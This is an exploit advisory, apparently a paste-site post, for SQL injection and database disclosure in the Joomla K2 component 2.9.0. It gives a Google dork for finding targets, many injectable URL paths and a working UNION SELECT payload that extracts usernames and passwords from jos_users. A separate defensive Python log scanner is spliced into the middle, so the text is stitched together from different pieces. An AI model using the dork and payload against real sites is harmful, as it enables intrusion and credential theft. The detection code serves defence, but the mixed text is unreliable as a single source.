KingSkrupellos

Joomla K2 Components 2.9.0 SQL Inj / DB Disclosure

Feb 3rd, 2019
####################################################################

# Exploit Title : Joomla K2 Components 2.9.0 SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 04/02/2019
# Vendor Homepage : getk2.org
# Software Download Link : getk2.org/downloads/?f=K2_v2.9.0.zip
# Software Information Link : extensions.joomla.org/extension/k2/
# Software Version : 2.9.0 and previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_k2''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Old Similar CVE [ Only Version is Different ] : CVE-2009-2395
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################
  23.  
# Description about Software :
***************************
The powerful award-winning content extension for Joomla with more than 3 million downloads (and counting)!

K2 provides an out-of-the-box integrated solution featuring rich content forms for items (think of Joomla articles with additional fields for article images, videos, image galleries and attachments), nested-level categories, tags, comments, a system to extend the item base form with additional fields (similar to CCK for those acquainted with Drupal), a powerful plugin API to extend item, category and user forms, ACL, frontend editing, sub-templates & a lot more!

Using K2, you can transform your Joomla website to a news/magazine site with author blogs, product catalogs, work portfolio, knowledge base, download/document manager, directory listing, event listing & more, all this bundled under one package!

####################################################################
  51.  
# Impact :
***********
The K2 2.9.0 component for Joomla and previous versions are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in the application's database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser.

* This software is also prone to an information exposure/database disclosure vulnerability. Successful exploits of this issue may allow an attacker to obtain sensitive information by downloading the full contents of the application's database.

* Any remote user may download the database files and gain access to sensitive information including unencrypted authentication credentials.

####################################################################
  83.  
# SQL Injection Exploit :
**********************

/index.php?option=com_k2&view=itemlist&category=[SQL Injection]
/index.php/component/users/?option=com_k2&view=itemlist&task=user&id=[SQL Injection]
/index.php?option=com_k2&view=itemlist&task=category&id=[ID-NUMBER]:video&Itemid=[SQL Injection]
/index.php?option=com_k2&view=itemlist&task=user&id=[SQL Injection]
/index.php?option=com_k2&view=item&layout=item&id=[SQLi]&Itemid=[SQL Injection]&lang=en
/index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL Injection]
/index.php?option=com_k2&view=item&layout=item&id=[ID-NUMBER]&Itemid=[SQL Injection]
/index.php?option=com_k2&view=itemlist&task=user&id=[ID-NUMBER][TOPIC-NAME]&Itemid=[SQL Injection]
/index.php?option=com_k2&view=item&id=[ID-NUMBER]:[TOPIC-NAME]&tmpl=component&print=[SQL Injection]
/index.php?option=com_k2&view=item&layout=item&id=[ID-NUMBER]&Itemid=[SQL Injection]
/index.php?option=com_k2&view=itemlist&task=tag&tag=[TAG-NAME-HERE]&Itemid=[SQL Injection]
/index.php?option=com_k2&view=itemlist&task=tag&tag=[TAG-NAME-HERE]&format=feed&type=atom&Itemid=[SQL Injection]
/index.php?option=com_k2&view=itemlist&task=date&year=[YEAR]&month=[MONTH]&day=[DAY]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]

  112.  
# Example SQL Injection Payload :
******************************
null'+and+1=2+union+select+1,concat(username,0x3a,password)KingSkrupellos,3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users/*
  118.  
####################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_k2/install.mysql.sql
/administrator/components/com_k2/uninstall.mysql.sql
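As an added example that is not part of the advisory, the following Python pass flags the request patterns listed in the two sections above in web-server access logs: K2 parameters carrying a decoded quote, comment or UNION SELECT, and fetches of the component's install/uninstall SQL scripts. The log format, the set of parameters treated as numeric and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of a common/combined access-log line (assumed format, not from the advisory).
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<uri>\S+) HTTP/[\d.]+"')
# K2 parameters the advisory lists as injection points that should only be numeric; K2 also accepts the "id:alias" slug form.
NUMERIC_PARAMS = {"id", "Itemid", "limitstart", "year", "month", "day", "print"}
NUMERIC_RE = re.compile(r"\d+(?::[\w-]+)?")
# Decoded-value indicators seen in the advisory's payload: stray quote, SQL comment, UNION SELECT.
SQLI_RE = re.compile(r"(?i)['\"`]|/\*|--\s|\bunion\b.*?\bselect\b")
# Table-definition scripts shipped in the extension package; the advisory lists them under database disclosure.
SCHEMA_PATHS = ("/administrator/components/com_k2/install.mysql.sql",
                "/administrator/components/com_k2/uninstall.mysql.sql")

# Constructed sample log lines (not real traffic); IPs are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Feb/2019:10:00:01 +0000] "GET /index.php?option=com_k2&view=item&id=20:video&Itemid=175 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [03/Feb/2019:10:00:02 +0000] "GET /index.php?option=com_k2&view=itemlist&task=user&id=62770%27 HTTP/1.1" 500 812',
    '203.0.113.5 - - [03/Feb/2019:10:00:03 +0000] "GET /index.php?option=com_k2&view=itemlist&task=tag&tag=null%27+and+1=2+union+select+1,concat(username,0x3a,password),3+from+jos_users/*&Itemid=1 HTTP/1.1" 200 9001',
    '203.0.113.5 - - [03/Feb/2019:10:00:04 +0000] "GET /administrator/components/com_k2/install.mysql.sql HTTP/1.1" 200 14000',
    '198.51.100.7 - - [03/Feb/2019:10:00:05 +0000] "GET /index.php?option=com_content&view=article&id=1%27 HTTP/1.1" 200 100',
]

def classify_request(log_line):
    """Return (label, detail) for a suspicious K2 request, or None if the line is uninteresting."""
    m = LOG_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    if unquote(parts.path).endswith(SCHEMA_PATHS):
        return ("k2-schema-file", unquote(parts.path))
    # parse_qsl percent-decodes values and turns '+' into spaces, so %27 becomes a real quote.
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    if not params.get("option", "").startswith("com_k2"):   # covers com_k2 and com_k2store
        return None
    for name, value in params.items():
        if SQLI_RE.search(value):
            return ("k2-sqli", f"{name}={value}")
        if name in NUMERIC_PARAMS and not NUMERIC_RE.fullmatch(value):
            return ("k2-malformed-id", f"{name}={value}")
    return None

def scan_log(lines):
    """Run the classifier over every line and return the list of hits, in log order."""
    return [hit for hit in map(classify_request, lines) if hit]

if __name__ == "__main__":
    for label, detail in scan_log(SAMPLE_LOG):
        print(f"{label:18} {detail}")
```

The install/uninstall scripts are the component's table-definition files shipped inside the extension package, so a hit on them signals enumeration of the K2 install rather than a copy of live table rows; the same classifier can feed a WAF block rule or a SIEM alert.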
  127.  
####################################################################

# Example Vulnerable Sites :
*************************
####################################################################

# Example SQL Database Error :
****************************
Warning: Declaration of JParameter::loadSetupFile($path) should be compatible with JRegistry::loadSetupFile() in /home/personer/public_html/libraries/joomla/html/parameter.php on line 512

Warning: Declaration of JCacheControllerPage::store($wrkarounds = true) should be compatible with JCacheController::store($data, $id, $group = NULL) in /home/personer/public_html/libraries/joomla/cache/controller/page.php on line 199

Warning: preg_replace(): The /e modifier is no longer supported, use preg_replace_callback instead in /home/personer/public_html/libraries/joomla/filter/input.php on line 652

Warning: Use of undefined constant K2_JVERSION - assumed 'K2_JVERSION' (this will throw an Error in a future version of PHP) in /home/personer/public_html/components/com_k2/k2.php on line 13

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################